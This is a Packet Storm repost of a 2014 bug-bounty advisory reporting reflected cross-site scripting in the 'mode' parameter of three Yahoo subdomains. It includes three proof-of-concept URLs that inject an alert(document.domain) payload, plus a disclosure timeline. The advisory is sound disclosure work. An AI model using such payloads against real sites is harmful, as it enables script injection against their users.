what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Yahoo mode Cross Site Scripting

Yahoo mode Cross Site Scripting
Posted Mar 9, 2013
Authored by Stefan Schurtz

The mode parameter on celebrity.yahoo.com, movies.yahoo.com, and music.yahoo.com suffered from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 913fb4b26dfe6be847660658730f8da43bbc26309738ea2037331f12f76b91f8

Yahoo mode Cross Site Scripting

Change Mirror Download

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)

Advisory: Yahoo Bug Bounty Program Vulnerability #4
#5 #6 Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 /
YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on celebrity.yahoo.com,
movies.yahoo.com, music.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing

==========================
Vulnerability Description
==========================

The 'mode'-Paramter on "https://celebrity.yahoo.com/",
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a
Cross-site Scripting vulnerability

==========================
PoC-Exploit
==========================

http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==========================
Disclosure Timeline
==========================

20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close